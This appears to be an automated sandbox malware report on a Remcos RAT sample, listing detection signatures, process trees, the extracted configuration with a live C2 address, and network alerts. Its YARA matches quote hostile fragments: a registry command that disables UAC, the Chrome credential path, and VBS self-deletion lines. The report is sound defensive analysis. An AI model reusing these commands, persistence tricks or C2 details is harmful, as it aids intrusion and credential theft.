Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OKkUGRkZV7.exe

Overview

General Information

Sample name:OKkUGRkZV7.exe
renamed because original name is a hash value
Original sample name:12f38b57f20acea350ed883756309c9516c6b5b814ebedcb19dcb5ba798579e1.exe
Analysis ID:1588332
MD5:f484f16874ddb071b45cb9f1fa8d0c56
SHA1:8cf9f6ab9a0a8520650145ae1702cc35f0e4b123
SHA256:12f38b57f20acea350ed883756309c9516c6b5b814ebedcb19dcb5ba798579e1
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • OKkUGRkZV7.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\OKkUGRkZV7.exe" MD5: F484F16874DDB071B45CB9F1FA8D0C56)
    • ambiparous.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\OKkUGRkZV7.exe" MD5: F484F16874DDB071B45CB9F1FA8D0C56)
      • svchost.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\OKkUGRkZV7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • iexplore.exe (PID: 7920 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • wscript.exe (PID: 8060 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ambiparous.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" MD5: F484F16874DDB071B45CB9F1FA8D0C56)
      • svchost.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6aab8:$a1: Remcos restarted by watchdog!
            • 0x6b030:$a3: %02i:%02i:%02i:%03i
            Click to see the 38 entries
            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  3.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  3.2.svchost.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 43 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , ProcessId: 8060, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OKkUGRkZV7.exe", CommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", ParentImage: C:\Users\user\AppData\Local\lecheries\ambiparous.exe, ParentProcessId: 7880, ParentProcessName: ambiparous.exe, ProcessCommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", ProcessId: 7900, ProcessName: svchost.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs" , ProcessId: 8060, ProcessName: wscript.exe
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\OKkUGRkZV7.exe", CommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", ParentImage: C:\Users\user\AppData\Local\lecheries\ambiparous.exe, ParentProcessId: 7880, ParentProcessName: ambiparous.exe, ProcessCommandLine: "C:\Users\user\Desktop\OKkUGRkZV7.exe", ProcessId: 7900, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\lecheries\ambiparous.exe, ProcessId: 7880, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 30 0F C2 2C CB 87 25 B5 69 01 22 00 77 48 42 83 92 4F 9F E5 99 5F D5 7C 8A D8 0F 42 5F 17 45 BF 49 A5 42 D4 38 96 AA F2 0E 1B 47 44 16 9A 49 78 80 FC 66 0B 6B 55 83 8F 77 20 D0 5B F9 67 8C ED , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZFXG9Y\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T00:06:38.629735+010020365941Malware Command and Control Activity Detected192.168.2.1149984192.3.64.1522559TCP
                  2025-01-11T00:07:26.497356+010020365941Malware Command and Control Activity Detected192.168.2.1149857192.3.64.1522559TCP
                  2025-01-11T00:07:48.884522+010020365941Malware Command and Control Activity Detected192.168.2.1149974192.3.64.1522559TCP
                  2025-01-11T00:08:11.264481+010020365941Malware Command and Control Activity Detected192.168.2.1149976192.3.64.1522559TCP
                  2025-01-11T00:08:33.670381+010020365941Malware Command and Control Activity Detected192.168.2.1149977192.3.64.1522559TCP
                  2025-01-11T00:08:56.062490+010020365941Malware Command and Control Activity Detected192.168.2.1149978192.3.64.1522559TCP
                  2025-01-11T00:09:18.468490+010020365941Malware Command and Control Activity Detected192.168.2.1149979192.3.64.1522559TCP
                  2025-01-11T00:09:40.871688+010020365941Malware Command and Control Activity Detected192.168.2.1149980192.3.64.1522559TCP
                  2025-01-11T00:10:03.252533+010020365941Malware Command and Control Activity Detected192.168.2.1149981192.3.64.1522559TCP
                  2025-01-11T00:10:25.676512+010020365941Malware Command and Control Activity Detected192.168.2.1149982192.3.64.1522559TCP
                  2025-01-11T00:10:48.918592+010020365941Malware Command and Control Activity Detected192.168.2.1149983192.3.64.1522559TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeVirustotal: Detection: 61%Perma Link
                  Source: OKkUGRkZV7.exeVirustotal: Detection: 61%Perma Link
                  Source: OKkUGRkZV7.exeReversingLabs: Detection: 65%
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeJoe Sandbox ML: detected
                  Source: OKkUGRkZV7.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_004338C8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004338C8
                  Source: ambiparous.exe, 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_68015bc1-d

                  Exploits

                  barindex
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407538 _wcslen,CoGetObject,3_2_00407538
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00407538 _wcslen,CoGetObject,8_2_00407538
                  Source: OKkUGRkZV7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: ambiparous.exe, 00000002.00000003.1388403621.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000002.00000003.1390662543.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1533944638.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1535030253.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ambiparous.exe, 00000002.00000003.1388403621.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000002.00000003.1390662543.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1533944638.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, ambiparous.exe, 00000007.00000003.1535030253.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, 00000003.00000003.1392980933.0000000000821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1397706009.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, iexplore.exe, 00000004.00000002.1393803718.0000000002FD0000.00000040.80000000.00040000.00000000.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000003.00000003.1392980933.0000000000821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1397706009.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000004.00000002.1393803718.0000000002FD0000.00000040.80000000.00040000.00000000.sdmp
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003A445A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AC6D1 FindFirstFileW,FindClose,0_2_003AC6D1
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003AC75C
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AEF95
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AF0F2
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003AF3F3
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A37EF
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A3B12
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003ABCBC
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00B5445A
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5C6D1 FindFirstFileW,FindClose,2_2_00B5C6D1
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00B5C75C
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B5EF95
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B5F0F2
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B5F3F3
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B537EF
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B53B12
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B5BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0044E8F9 FindFirstFileExA,3_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
